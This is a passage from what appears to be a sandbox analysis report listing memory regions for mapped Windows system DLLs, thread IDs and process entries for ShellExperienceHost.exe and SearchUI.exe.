0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3986 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3987 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3988 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 3989 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3990 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 3991 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3992 start_va = 0x7ffaf17d0000 end_va = 0x7ffaf1870fff entry_point = 0x7ffaf17d0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 3993 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3994 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3995 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3996 start_va = 0x7ffaf1ce0000 end_va = 0x7ffaf1d2afff entry_point = 0x7ffaf1ce0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 3997 start_va = 0x7ffaf1d30000 end_va = 0x7ffaf1ee1fff entry_point = 0x7ffaf1d30000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 3998 start_va = 0x7ffaf1ef0000 end_va = 0x7ffaf215dfff entry_point = 0x7ffaf1ef0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 3999 start_va = 0x7ffaf2160000 end_va = 0x7ffaf21fbfff entry_point = 0x7ffaf2160000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4000 start_va = 0x7ffaf2200000 end_va = 0x7ffaf24a2fff entry_point = 0x7ffaf2200000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 4001 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4002 start_va = 0x7ffaf2500000 end_va = 0x7ffaf255bfff entry_point = 0x7ffaf2500000 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 4003 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4004 start_va = 0x7ffaf2630000 end_va = 0x7ffaf2700fff entry_point = 0x7ffaf2630000 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 4005 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4006 start_va = 0x7ffaf2a20000 end_va = 0x7ffaf2a85fff entry_point = 0x7ffaf2a20000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 4007 start_va = 0x7ffaf2a90000 end_va = 0x7ffaf2ab4fff entry_point = 0x7ffaf2a90000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4008 start_va = 0x7ffaf2ac0000 end_va = 0x7ffaf2ae5fff entry_point = 0x7ffaf2ac0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4009 start_va = 0x7ffaf2af0000 end_va = 0x7ffaf2b21fff entry_point = 0x7ffaf2af0000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 4010 start_va = 0x7ffaf2b30000 end_va = 0x7ffaf2b44fff entry_point = 0x7ffaf2b30000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 4011 start_va = 0x7ffaf2b50000 end_va = 0x7ffaf2b8bfff entry_point = 0x7ffaf2b50000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 4012 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 4013 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4014 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4015 start_va = 0x7ffaf2ef0000 end_va = 0x7ffaf2fddfff entry_point = 0x7ffaf2ef0000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 4016 start_va = 0x7ffaf3070000 end_va = 0x7ffaf3097fff entry_point = 0x7ffaf3070000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 4017 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 4018 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4019 start_va = 0x7ffaf36d0000 end_va = 0x7ffaf36ebfff entry_point = 0x7ffaf36d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 4020 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4021 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4022 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4023 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4024 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4025 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4026 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4027 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4028 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4029 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4030 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4031 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4032 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4033 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4034 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4035 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4036 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4037 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4038 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4039 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4040 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4041 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4042 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4043 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4044 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4045 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4046 start_va = 0x7ffaf50e0000 end_va = 0x7ffaf513afff entry_point = 0x7ffaf50e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4047 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4048 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4049 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4050 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4051 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4052 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4053 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4054 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4055 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4056 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4057 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4058 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4059 start_va = 0x7ffaf7250000 end_va = 0x7ffaf72befff entry_point = 0x7ffaf7250000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 4060 start_va = 0x7ffaf72c0000 end_va = 0x7ffaf72dbfff entry_point = 0x7ffaf72c0000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 4061 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4062 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4063 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4064 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4065 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4066 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4067 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6001 start_va = 0x27e0000 end_va = 0x27e2fff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 6002 start_va = 0x28c0000 end_va = 0x28d2fff entry_point = 0x28c0000 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 6003 start_va = 0xac10000 end_va = 0xb101fff entry_point = 0x0 region_type = private name = "private_0x000000000ac10000" filename = "" Region: id = 6765 start_va = 0xc60000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 6766 start_va = 0x27e0000 end_va = 0x27e2fff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 6767 start_va = 0x4480000 end_va = 0x44fffff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 6768 start_va = 0x4610000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 6769 start_va = 0x4d20000 end_va = 0x4d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 6770 start_va = 0x7ff7b9f8e000 end_va = 0x7ff7b9f8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f8e000" filename = "" Region: id = 6771 start_va = 0x7ff7ba0b7000 end_va = 0x7ff7ba0b8fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0b7000" filename = "" Region: id = 6772 start_va = 0x7ff7ba0b9000 end_va = 0x7ff7ba0bafff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0b9000" filename = "" Region: id = 6773 start_va = 0x7ff7ba0bb000 end_va = 0x7ff7ba0bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0bb000" filename = "" Region: id = 7005 start_va = 0x4fa0000 end_va = 0x4fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 7006 start_va = 0x4fe0000 end_va = 0x5010fff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 7007 start_va = 0x5eb0000 end_va = 0x5f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 7008 start_va = 0x7ff7b9f8c000 end_va = 0x7ff7b9f8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f8c000" filename = "" Region: id = 7081 start_va = 0x27e0000 end_va = 0x27e2fff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Thread: id = 615 os_tid = 0xfdc Thread: id = 616 os_tid = 0xbfc Thread: id = 617 os_tid = 0xb24 Thread: id = 618 os_tid = 0xb18 Thread: id = 619 os_tid = 0xb08 Thread: id = 620 os_tid = 0xb0c Thread: id = 621 os_tid = 0xafc Thread: id = 622 os_tid = 0xaf4 Thread: id = 623 os_tid = 0xaf0 Thread: id = 624 os_tid = 0xaec Thread: id = 625 os_tid = 0xad8 Thread: id = 626 os_tid = 0xad4 Thread: id = 627 os_tid = 0xac4 Thread: id = 628 os_tid = 0x9f8 Thread: id = 629 os_tid = 0x9c4 Thread: id = 630 os_tid = 0x958 Thread: id = 631 os_tid = 0x944 Thread: id = 632 os_tid = 0x90c Thread: id = 633 os_tid = 0x8fc Thread: id = 634 os_tid = 0x8f8 Thread: id = 635 os_tid = 0x8f4 Thread: id = 636 os_tid = 0x8c8 Thread: id = 637 os_tid = 0x8b0 Thread: id = 638 os_tid = 0x8ac Thread: id = 639 os_tid = 0x898 Thread: id = 640 os_tid = 0x890 Thread: id = 641 os_tid = 0x88c Thread: id = 642 os_tid = 0x880 Thread: id = 643 os_tid = 0x87c Thread: id = 644 os_tid = 0x878 Thread: id = 645 os_tid = 0x874 Thread: id = 646 os_tid = 0x870 Thread: id = 647 os_tid = 0x86c Thread: id = 648 os_tid = 0x840 Thread: id = 649 os_tid = 0x83c Thread: id = 650 os_tid = 0x824 Thread: id = 821 os_tid = 0x76c Thread: id = 826 os_tid = 0x554 Thread: id = 832 os_tid = 0xf18 Thread: id = 833 os_tid = 0xf1c Thread: id = 849 os_tid = 0x310 Process: id = "57" image_name = "shellexperiencehost.exe" filename = "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe" page_root = "0x74e8d000" os_pid = "0x9b0" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe\" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca" cur_dir = "C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 651 os_tid = 0x8d4 Thread: id = 652 os_tid = 0x868 Thread: id = 653 os_tid = 0x8b4 Thread: id = 654 os_tid = 0x51c Thread: id = 655 os_tid = 0xbcc Thread: id = 656 os_tid = 0xbc8 Thread: id = 657 os_tid = 0xbc4 Thread: id = 658 os_tid = 0xbc0 Thread: id = 659 os_tid = 0xbbc Thread: id = 660 os_tid = 0xbb8 Thread: id = 661 os_tid = 0xbb4 Thread: id = 662 os_tid = 0xbb0 Thread: id = 663 os_tid = 0xbac Thread: id = 664 os_tid = 0xba8 Thread: id = 665 os_tid = 0xba4 Thread: id = 666 os_tid = 0xba0 Thread: id = 667 os_tid = 0xb9c Thread: id = 668 os_tid = 0xb98 Thread: id = 669 os_tid = 0xb94 Thread: id = 670 os_tid = 0xb90 Thread: id = 671 os_tid = 0xb8c Thread: id = 672 os_tid = 0xb88 Thread: id = 673 os_tid = 0xb84 Thread: id = 674 os_tid = 0xb80 Thread: id = 675 os_tid = 0xb7c Thread: id = 676 os_tid = 0xb78 Thread: id = 677 os_tid = 0xb70 Thread: id = 678 os_tid = 0xb64 Thread: id = 679 os_tid = 0xb54 Thread: id = 680 os_tid = 0xb50 Thread: id = 681 os_tid = 0xae8 Thread: id = 682 os_tid = 0xacc Thread: id = 683 os_tid = 0xac0 Thread: id = 684 os_tid = 0xa08 Thread: id = 685 os_tid = 0xa00 Thread: id = 686 os_tid = 0x9fc Thread: id = 687 os_tid = 0x9f4 Thread: id = 688 os_tid = 0x9f0 Thread: id = 689 os_tid = 0x9ec Thread: id = 690 os_tid = 0x9e0 Thread: id = 691 os_tid = 0x9dc Thread: id = 692 os_tid = 0x9d8 Thread: id = 693 os_tid = 0x9d4 Thread: id = 694 os_tid = 0x9d0 Thread: id = 695 os_tid = 0x9cc Thread: id = 696 os_tid = 0x9c8 Thread: id = 697 os_tid = 0x9bc Thread: id = 698 os_tid = 0x9b4 Process: id = "58" image_name = "searchui.exe" filename = "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe" page_root = "0x53494000" os_pid = "0xa1c" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe\" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca" cur_dir = "C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], 